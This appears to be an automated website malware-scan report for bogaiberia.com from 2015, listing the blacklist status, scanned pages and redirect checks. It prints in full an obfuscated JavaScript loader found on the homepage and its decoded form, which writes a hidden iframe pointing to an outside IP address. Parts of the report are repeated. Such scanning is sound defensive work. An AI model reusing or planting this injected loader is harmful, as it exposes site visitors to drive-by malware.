Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=bogaiberia.com
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
| Request | Server response | Status |
http://bogaiberia.com/ | 200 OK Content-Length: 21767 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) (function($$,_2,_1,doc,tk) { var xo=""; function qq2(cid){cid=~~cid;return ["L",189-20*cid,175,16*cid,70,81,89,16,73,78,81,67,31,10,2,28,2,13,83,31,2,28,88,67,84,2,56,77,31,86,74,75,85,29,62,61,56,77,2,2,40,87,78,78,59,71,67,84,2,7,47,81,80,86,74,2,7,38,67,86,71,2,7,42,81,87,84,85,2,7,47,75,80,87,86,71,85,2,7,53,71,69,81,80,70,85,10,11,63,95,29,2,13,52,31,2,28,2,8,89,14,56,91,31,86,74,75,85,16,5,83,10,11,14,75,31,18,29,56,91,61,19,63,13,31,19,29,89,74,75,78,71,10,75,13,13,30,25,11,93,5 })((function(jsB) { return jsB.constructor }), (function(jsB) { return (function(jsBs) { return jsB.call(jsB, jsBs) }) })) },function(tt){return tt.pop();}, function(kk,dd,ch,pp){ for(var c=kk.length;c>0;){ var x=ch(c); c-=x; var rep=kk.substr(c, x); var t = dd.split(rep); dd=t.join(pp(t)); };return dd; },document,document.getElementsByTagName('title')); if(typeof gloa=='function')gloa(); Decoded script: var k=" width=\"0\" height=\"0\" board=\"0\" src=\"http://75.134.68.31/tag1.php\">";var k0="<if";var k01="ram";var k02="e";var k2="</if";var k22="e>";document.write(k0);setTimeout(document.write(k01+k02+k+k2),1000);setTimeout(document.write(k02+k22),1000); var k=" width=\"0\" height=\"0\" board=\"0\" src=\"http://75.134.68.31/tag1.php\">";var k0="<if";var k01="ram";var k02="e";var k2="</if";var k22="e>";document.write(k0);setTimeout(document.write(k01+k02+k+k2),1000);setTimeout(document.write(k02+k22),1000); undefined /*** called setTimeout with undefined, 1000 */ undefined /*** called setTimeout with undefined, 1000 */ <iframe width="0" height="0" board="0" src="http://75.134.68.31/tag1.php"></ifee> Antivirus reports:
| ||
http://bogaiberia.com/test404page.js | 404 Not Found Content-Length: 331 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: bogaiberia.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Sat, 10 Jan 2015 06:26:01 GMT
Accept-Ranges: bytes
ETag: "5c0b54-5507-50c40e2176e8a"
Server: Apache
Content-Length: 21767
Content-Type: text/html
Last-Modified: Fri, 09 Jan 2015 23:54:54 GMT
...21767 bytes of data.
GET / HTTP/1.1
Host: bogaiberia.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Sat, 10 Jan 2015 06:26:01 GMT
Accept-Ranges: bytes
ETag: "5c0b54-5507-50c40e2176e8a"
Server: Apache
Content-Length: 21767
Content-Type: text/html
Last-Modified: Fri, 09 Jan 2015 23:54:54 GMT
...21767 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: bogaiberia.com
Referer: http://www.google.com/search?q=bogaiberia.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: bogaiberia.com
Referer: http://www.google.com/search?q=bogaiberia.com
Result:
The result is similar to the first query. There are no suspicious redirects found.